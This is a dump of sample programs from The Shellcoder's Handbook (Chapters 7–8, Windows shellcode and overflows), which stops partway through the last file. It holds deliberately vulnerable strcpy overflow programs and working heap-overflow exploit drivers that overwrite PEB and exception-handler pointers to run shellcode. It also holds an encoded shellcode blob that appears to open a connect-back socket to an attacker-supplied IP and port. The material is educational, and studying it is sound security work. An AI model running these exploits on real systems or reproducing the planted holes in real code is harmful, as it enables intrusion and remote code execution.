*element_16 38 | ); 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /Chapter_07/Shellcoders07sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 7: Windows Shellcode 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | 18 | main(int argc, char **argv) 19 | { 20 | char * p; 21 | unsigned int hash; 22 | 23 | if (argc<2) 24 | { 25 | printf("Usage: hash.exe kernel32.dll\n"); 26 | exit(0); 27 | } 28 | 29 | p=argv[1]; 30 | 31 | hash=0; 32 | while (*p!=0) 33 | { 34 | //toupper the character 35 | hash=hash + (*(unsigned char * )p | 0x60); 36 | p++; 37 | hash=hash << 1; 38 | } 39 | printf("Hash: 0x%8.8x\n",hash); 40 | 41 | } 42 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | dword MyExceptionHandler(void) 20 | { 21 | printf("In exception handler...."); 22 | ExitProcess(1); 23 | return 0; 24 | } 25 | 26 | int main() 27 | { 28 | try 29 | { 30 | __asm 31 | { 32 | // Cause an exception 33 | xor eax,eax 34 | call eax 35 | } 36 | 37 | } 38 | __except(MyExceptionHandler()) 39 | { 40 | printf("oops..."); 41 | } 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int main() 20 | { 21 | FILETIME ft; 22 | unsigned int Cookie=0; 23 | unsigned int tmp=0; 24 | unsigned int *ptr=0; 25 | LARGE_INTEGER perfcount; 26 | 27 | GetSystemTimeAsFileTime(&ft); 28 | Cookie = ft.dwHighDateTime ^ ft.dwLowDateTime; 29 | Cookie = Cookie ^ GetCurrentProcessId(); 30 | Cookie = Cookie ^ GetCurrentThreadId(); 31 | Cookie = Cookie ^ GetTickCount(); 32 | QueryPerformanceCounter(&perfcount); 33 | ptr = (unsigned int)&perfcount; 34 | tmp = *(ptr+1) ^ *ptr; 35 | Cookie = Cookie ^ tmp; 36 | printf("Cookie: %.8X\n",Cookie); 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram03.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | HANDLE hp=NULL; 20 | int ReturnHostFromUrl(char **, char *); 21 | 22 | int main() 23 | { 24 | char *ptr = NULL; 25 | hp = HeapCreate(0,0x1000,0x10000); 26 | ReturnHost-FromUrl(&ptr,"http://www.ngssoftware.com/index.html"); 27 | printf("Host is %s",ptr); 28 | HeapFree(hp,0,ptr); 29 | return 0; 30 | 31 | } 32 | 33 | int ReturnHostFromUrl(char **buf, char *url) 34 | { 35 | int count = 0; 36 | char *p = NULL; 37 | char buffer[40]=""; 38 | 39 | // Get a pointer to the start of the host 40 | p = strstr(url,"http://"); 41 | if(!p) 42 | return 0; 43 | p = p + 7; 44 | // do processing on a local copy 45 | strcpy(buffer,p); // <------ NOTE 1 46 | // find the first slash 47 | while(buffer[count] !='/') 48 | count ++; 49 | // set it to NULL 50 | buffer[count] = 0; 51 | // We now have in buffer the host name 52 | // Make a copy of this on the heap 53 | p = (char *)HeapAlloc(hp,0,strlen(buffer)+1); 54 | if(!p) 55 | return 0; 56 | strcpy(p,buffer); 57 | *buf = p; // <-------------- NOTE 2 58 | return 0; 59 | } 60 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram04.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | DWORD MyExceptionHandler(void); 20 | int foo(char *buf); 21 | 22 | int main(int argc, char *argv[]) 23 | { 24 | HMODULE l; 25 | l = LoadLibrary("msvcrt.dll"); 26 | l = LoadLibrary("netapi32.dll"); 27 | printf("\n\nHeapoverflow program.\n"); 28 | if(argc != 2) 29 | return printf("ARGS!"); 30 | foo(argv[1]); 31 | return 0; 32 | } 33 | 34 | DWORD MyExceptionHandler(void) 35 | { 36 | printf("In exception handler...."); 37 | ExitProcess(1); 38 | return 0; 39 | } 40 | 41 | int foo(char *buf) 42 | { 43 | HLOCAL h1 = 0, h2 = 0; 44 | HANDLE hp; 45 | 46 | __try{ 47 | hp = HeapCreate(0,0x1000,0x10000); 48 | if(!hp) 49 | return printf("Failed to create heap.\n"); 50 | 51 | h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260); 52 | 53 | printf("HEAP: %.8X %.8X\n",h1,&h1); 54 | 55 | // Heap Overflow occurs here: 56 | strcpy(h1,buf); 57 | 58 | // This second call to HeapAlloc() is when we gain control 59 | h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260); 60 | printf("hello"); 61 | } 62 | __except(MyExceptionHandler()) 63 | { 64 | printf("oops..."); 65 | } 66 | return 0; 67 | } 68 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram05.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #5 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | unsigned int GetAddress(char *lib, char *func); 20 | void fixupaddresses(char *tmp, unsigned int x); 21 | 22 | int main() 23 | { 24 | unsigned char buffer[300]=""; 25 | unsigned char heap[8]=""; 26 | unsigned char pebf[8]=""; 27 | unsigned char shellcode[200]=""; 28 | unsigned int address_of_system = 0; 29 | unsigned int address_of_RtlEnterCriticalSection = 0; 30 | unsigned char tmp[8]=""; 31 | unsigned int cnt = 0; 32 | 33 | printf("Getting addresses...\n"); 34 | address_of_system = GetAddress("msvcrt.dll","system"); 35 | address_of_RtlEnterCriticalSection = GetAd-dress("ntdll.dll","RtlEnterCriticalSection"); 36 | if(address_of_system == 0 || ad-dress_of_RtlEnterCriticalSection == 0) 37 | return printf("Failed to get addresses\n"); 38 | printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system); 39 | printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection); 40 | strcpy(buffer,"heap1 "); 41 | 42 | // Shellcode - repairs the PEB then calls system("calc"); 43 | strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9"); 44 | fixupaddresses(tmp,address_of_RtlEnterCriticalSection); 45 | strcat(buffer,tmp); 46 | strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); 47 | fixupaddresses(tmp,address_of_system); 48 | strcat(buffer,tmp); 49 | strcat(buffer,"\xFF\xD1"); 50 | 51 | // Padding 52 | while(cnt < 58) 53 | { 54 | strcat(buffer,"DDDD"); 55 | cnt ++; 56 | } 57 | 58 | // Pointer to RtlEnterCriticalSection pointer - 4 in PEB 59 | strcat(buffer,"\x1C\xF0\xFD\x7f"); 60 | 61 | // Pointer to heap and thus shellcode 62 | strcat(buffer,"\x88\x06\x35"); 63 | 64 | strcat(buffer,"\""); 65 | printf("\nExecuting heap1.exe... calc should open.\n"); 66 | system(buffer); 67 | return 0; 68 | } 69 | 70 | unsigned int GetAddress(char *lib, char *func) 71 | { 72 | HMODULE l=NULL; 73 | unsigned int x=0; 74 | l = LoadLibrary(lib); 75 | if(!l) 76 | return 0; 77 | x = GetProcAddress(l,func); 78 | if(!x) 79 | return 0; 80 | return x; 81 | } 82 | 83 | void fixupaddresses(char *tmp, unsigned int x) 84 | { 85 | unsigned int a = 0; 86 | a = x; 87 | a = a << 24; 88 | a = a >> 24; 89 | tmp[0]=a; 90 | a = x; 91 | a = a >> 8; 92 | a = a << 24; 93 | a = a >> 24 ; 94 | tmp[1]=a; 95 | a = x; 96 | a = a >> 16; 97 | a = a << 24; 98 | a = a >> 24; 99 | tmp[2]=a; 100 | a = x; 101 | a = a >> 24; 102 | tmp[3]=a; 103 | } 104 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram06.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #6 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | unsigned int GetAddress(char *lib, char *func); 20 | void fixupaddresses(char *tmp, unsigned int x); 21 | 22 | int main() 23 | { 24 | unsigned char buffer[300]=""; 25 | unsigned char heap[8]=""; 26 | unsigned char pebf[8]=""; 27 | unsigned char shellcode[200]=""; 28 | unsigned int address_of_system = 0; 29 | unsigned char tmp[8]=""; 30 | unsigned int cnt = 0; 31 | 32 | printf("Getting address of system...\n"); 33 | 34 | address_of_system = GetAddress("msvcrt.dll","system"); 35 | if(address_of_system == 0) 36 | return printf("Failed to get address.\n"); 37 | 38 | printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system); 39 | 40 | strcpy(buffer,"heap1 "); 41 | 42 | while(cnt < 5) 43 | { 44 | strcat(buffer,"\x90\x90\x90\x90"); 45 | cnt ++; 46 | } 47 | 48 | // Shellcode to call system("calc"); 49 | strcat(buffer,"\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); 50 | fixupaddresses(tmp,address_of_system); 51 | strcat(buffer,tmp); 52 | strcat(buffer,"\xFF\xD1");; 53 | 54 | cnt = 0; 55 | while(cnt < 58) 56 | { 57 | strcat(buffer,"DDDD"); 58 | cnt ++; 59 | } 60 | 61 | // Pointer to 0x77FC3210 - 4. 0x77FC3210 holds 62 | // the pointer to the first _VECTORED_EXCEPTION_NODE 63 | // structure. 64 | strcat(buffer,"\x0C\x32\xFC\x77"); 65 | 66 | // Pointer to our psueudo _VECTORED_EXCEPTION_NODE 67 | // structure at address 0x0012FF48. This address + 8 68 | // contains a pointer to our allocated buffer. This 69 | // is what will be called when the vectored exception 70 | // handling kicks in. Modify this according to where 71 | // it can be found on your system 72 | strcat(buffer,"\x48\xff\x12\x00"); 73 | 74 | printf("\nExecuting heap1.exe... calc should open.\n"); 75 | system(buffer); 76 | return 0; 77 | } 78 | 79 | unsigned int GetAddress(char *lib, char *func) 80 | { 81 | HMODULE l=NULL; 82 | unsigned int x=0; 83 | l = LoadLibrary(lib); 84 | if(!l) 85 | return 0; 86 | x = GetProcAddress(l,func); 87 | if(!x) 88 | return 0; 89 | return x; 90 | } 91 | 92 | void fixupaddresses(char *tmp, unsigned int x) 93 | { 94 | unsigned int a = 0; 95 | a = x; 96 | a = a << 24; 97 | a = a >> 24; 98 | tmp[0]=a; 99 | a = x; 100 | a = a >> 8; 101 | a = a << 24; 102 | a = a >> 24 ; 103 | tmp[1]=a; 104 | a = x; 105 | a = a >> 16; 106 | a = a << 24; 107 | a = a >> 24; 108 | tmp[2]=a; 109 | a = x; 110 | a = a >> 24; 111 | tmp[3]=a; 112 | } 113 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram07.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #7 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int foo(char *buf); 20 | 21 | int main(int argc, char *argv[]) 22 | { 23 | HMODULE l; 24 | l = LoadLibrary("msvcrt.dll"); 25 | l = LoadLibrary("netapi32.dll"); 26 | printf("\n\nHeapoverflow program.\n"); 27 | if(argc != 2) 28 | return printf("ARGS!"); 29 | foo(argv[1]); 30 | return 0; 31 | } 32 | 33 | int foo(char *buf) 34 | { 35 | HLOCAL h1 = 0, h2 = 0; 36 | HANDLE hp; 37 | 38 | hp = HeapCreate(0,0x1000,0x10000); 39 | if(!hp) 40 | return printf("Failed to create heap.\n"); 41 | h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260); 42 | printf("HEAP: %.8X %.8X\n",h1,&h1); 43 | 44 | // Heap Overflow occurs here: 45 | strcpy(h1,buf); 46 | 47 | // We gain control of this second call to HeapAlloc 48 | h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260); 49 | printf("hello"); 50 | return 0; 51 | } 52 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram08.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #8 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | unsigned int GetAddress(char *lib, char *func); 20 | void fixupaddresses(char *tmp, unsigned int x); 21 | 22 | int main() 23 | { 24 | unsigned char buffer[1000]=""; 25 | unsigned char heap[8]=""; 26 | unsigned char pebf[8]=""; 27 | unsigned char shellcode[200]=""; 28 | unsigned int address_of_system = 0; 29 | unsigned char tmp[8]=""; 30 | unsigned int a = 0; 31 | int cnt = 0; 32 | 33 | printf("Getting address of system...\n"); 34 | address_of_system = GetAddress("msvcrt.dll","system"); 35 | if(address_of_system == 0) 36 | return printf("Failed to get address.\n"); 37 | printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system); 38 | strcpy(buffer,"heap1 "); 39 | while(cnt < 66) 40 | { 41 | strcat(buffer,"DDDD"); 42 | cnt++; 43 | } 44 | 45 | // This is where EDI+0x74 points to so we 46 | // need to do a short jmp forwards 47 | strcat(buffer,"\xEB\x14"); 48 | 49 | // some padding 50 | strcat(buffer,"\x44\x44\x44\x44\x44\x44"); 51 | 52 | // This address (0x77C3BBAD : netapi32.dll XP SP1) contains 53 | // a "call dword ptr[edi+0x74]" instruction. We overwrite 54 | // the Unhandled Exception Filter with this address. 55 | 56 | strcat(buffer,"\xad\xbb\xc3\x77"); 57 | 58 | // Pointer to the Unhandled Exception Filter 59 | strcat(buffer,"\xB4\x73\xED\x77"); // 77ED73B4 60 | 61 | cnt = 0; 62 | 63 | while(cnt < 21) 64 | { 65 | strcat(buffer,"\x90"); 66 | cnt ++; 67 | } 68 | // Shellcode stuff to call system("calc"); 69 | strcat(buffer,"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); 70 | fixupaddresses(tmp,address_of_system); 71 | strcat(buffer,tmp); 72 | strcat(buffer,"\xFF\xD1\x90\x90"); 73 | printf("\nExecuting heap1.exe... calc should open.\n"); 74 | system(buffer); 75 | return 0; 76 | } 77 | 78 | unsigned int GetAddress(char *lib, char *func) 79 | { 80 | HMODULE l=NULL; 81 | unsigned int x=0; 82 | l = LoadLibrary(lib); 83 | if(!l) 84 | return 0; 85 | x = GetProcAddress(l,func); 86 | if(!x) 87 | return 0; 88 | return x; 89 | } 90 | 91 | void fixupaddresses(char *tmp, unsigned int x) 92 | { unsigned int a = 0; 93 | a = x; 94 | a = a << 24; 95 | a = a >> 24; 96 | tmp[0]=a; 97 | a = x; 98 | a = a >> 8; 99 | a = a << 24; 100 | a = a >> 24 ; 101 | tmp[1]=a; 102 | a = x; 103 | a = a >> 16; 104 | a = a << 24; 105 | a = a >> 24; 106 | tmp[2]=a; 107 | a = x; 108 | a = a >> 24; 109 | tmp[3]=a; 110 | } 111 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram09.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #9 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | 18 | int main() 19 | { 20 | __asm{ 21 | mov eax, dword ptr fs:[0x18] 22 | push eax 23 | } 24 | printf("TEB: %.8X\n"); 25 | 26 | __asm{ 27 | add esp,4 28 | } 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram10.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #10 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | // We've just landed in our buffer after a 17 | // call to dword ptr[edi+74]. This, therefore 18 | // is a pointer to the heap control structure 19 | // so move this into edx as we'll need to 20 | // set some values here 21 | mov edx, dword ptr[edi+74] 22 | // If running on Windows 2000 use this 23 | // instead 24 | // mov edx, dword ptr[esi+0x4C] 25 | // Push 0x18 onto the stack 26 | push 0x18 27 | // and pop into into EBX 28 | pop ebx 29 | // Get a pointer to the Thread Information 30 | // Block at fs:[18] 31 | mov eax, dword ptr fs:[ebx] 32 | // Get a pointer to the Process Environment 33 | // Block from the TEB. 34 | mov eax, dword ptr[eax+0x30] 35 | // Get a pointer to the default process heap 36 | // from the PEB 37 | mov eax, dword ptr[eax+0x18] 38 | // We now have in eax a pointer to the heap 39 | // This address will be of the form 0x00nn0000 40 | // Adjust the pointer to the heap to point to the 41 | // TotalFreeSize dword of the heap structure 42 | add al,0x28 43 | // move the WORD in TotalFreeSize into si 44 | mov si, word ptr[eax] 45 | // and then write this to our heap control 46 | // structure. We need this. 47 | mov word ptr[edx],si 48 | // Adjust edx by 2 49 | inc edx 50 | inc edx 51 | // Set the previous size to 8 52 | mov byte ptr[edx],0x08 53 | inc edx 54 | // Set the next 2 bytes to 0 55 | mov si, word ptr[edx] 56 | xor word ptr[edx],si 57 | inc edx 58 | inc edx 59 | // Set the flags to 0x14 60 | mov byte ptr[edx],0x14 61 | inc edx 62 | // and the next 2 bytes to 0 63 | mov si, word ptr[edx] 64 | xor word ptr[edx],si 65 | inc edx 66 | inc edx 67 | // now adjust eax to point to heap_base+0x178 68 | // It's already heap_base+0x28 69 | add ax,0x150 70 | // eax now points to FreeLists[0] 71 | // now write edx into FreeLists[0].Flink 72 | mov dword ptr[eax],edx 73 | // and write edx into FreeLists[0].Blink 74 | mov dword ptr[eax+4],edx 75 | // Finally set the pointers at the end of our 76 | // block to point to FreeLists[0] 77 | mov dword ptr[edx],eax 78 | mov dword ptr[edx+4],eax 79 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram11.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #11 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | unsigned char buffer[32]=""; 20 | FARPROC mprintf = 0; 21 | FARPROC mstrcpy = 0; 22 | 23 | int main(int argc, char *argv[]) 24 | { 25 | HMODULE l = 0; 26 | l = LoadLibrary("msvcrt.dll"); 27 | if(!l) 28 | return 0; 29 | mprintf = GetProcAddress(l,"printf"); 30 | if(!mprintf) 31 | return 0; 32 | mstrcpy = GetProcAddress(l,"strcpy"); 33 | if(!mstrcpy) 34 | return 0; 35 | (mstrcpy)(buffer,argv[1]); 36 | __asm{ add esp,8 } 37 | (mprintf)("%s",buffer); 38 | __asm{ add esp,8 } 39 | FreeLibrary(l); 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram12.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #12 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | 18 | int foo(char *); 19 | 20 | int main(int argc, char *argv[]) 21 | { 22 | unsigned char buffer[520]=""; 23 | if(argc !=2) 24 | return printf("Please supply an argument!\n"); 25 | foo(argv[1]); 26 | return 0; 27 | } 28 | 29 | int foo(char *input) 30 | { 31 | unsigned char buffer[600]=""; 32 | printf("%.8X\n",&buffer); 33 | strcpy(buffer,input); 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /Chapter_08/Shellcoders08sampleprogram13.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 8: Windows Overflows 10 | Sample Program #13 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | unsigned char exploit[510]= 20 | "\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF" 21 | "\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50" 22 | "\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C" 23 | "\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89" 24 | "\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13" 25 | "\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC" 26 | "\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C" 27 | "\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89" 28 | "\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83" 29 | "\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89" 30 | "\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33" 31 | "\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A" 32 | "\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66" 33 | "\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45" 34 | "\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0" 35 | "\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84" 36 | "\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57" 37 | "\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50" 38 | "\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8" 39 | "\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD" 40 | "\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03" 41 | "\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48" 42 | "\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83" 43 | "\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41" 44 | "\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03" 45 | "\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3" 46 | "\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C" 47 | "\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8" 48 | "\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B" 49 | "\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B" 50 | "\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF" 51 | "\xFF\xFF\xFF\xFF"; 52 | 53 | 54 | int main(int argc, char *argv[]) 55 | { 56 | int cnt = 0; 57 | unsigned char buffer[1000]=""; 58 | 59 | if(argc !=3) 60 | return 0; 61 | 62 | StartWinsock(); 63 | 64 | // Set the IP address and port in the exploit code 65 | // If your IP address has a NULL in it then the 66 | // string will be truncated. 67 | SetUpExploit(argv[1],atoi(argv[2])); 68 | 69 | // name of the vulnerable program 70 | strcpy(buffer,"nes "); 71 | // copy exploit code to the buffer 72 | strcat(buffer,exploit); 73 | 74 | // Pad out the buffer 75 | while(cnt < 25) 76 | { 77 | strcat(buffer,"\x90\x90\x90\x90"); 78 | cnt ++; 79 | } 80 | 81 | strcat(buffer,"\x90\x90\x90\x90"); 82 | 83 | // Here's where we overwrite the saved return address 84 | // This is the address of lstrcatA on Windows XP SP 1 85 | // 0x77E74B66 86 | strcat(buffer,"\x66\x4B\xE7\x77"); 87 | 88 | // Set the return address for lstrcatA 89 | // this is where our code will be copied to 90 | // in the TEB 91 | strcat(buffer,"\xBC\xE1\xFD\x7F"); 92 | 93 | // Set the destination buffer for lstrcatA 94 | // This is in the TEB and we'll return to 95 | // here. 96 | 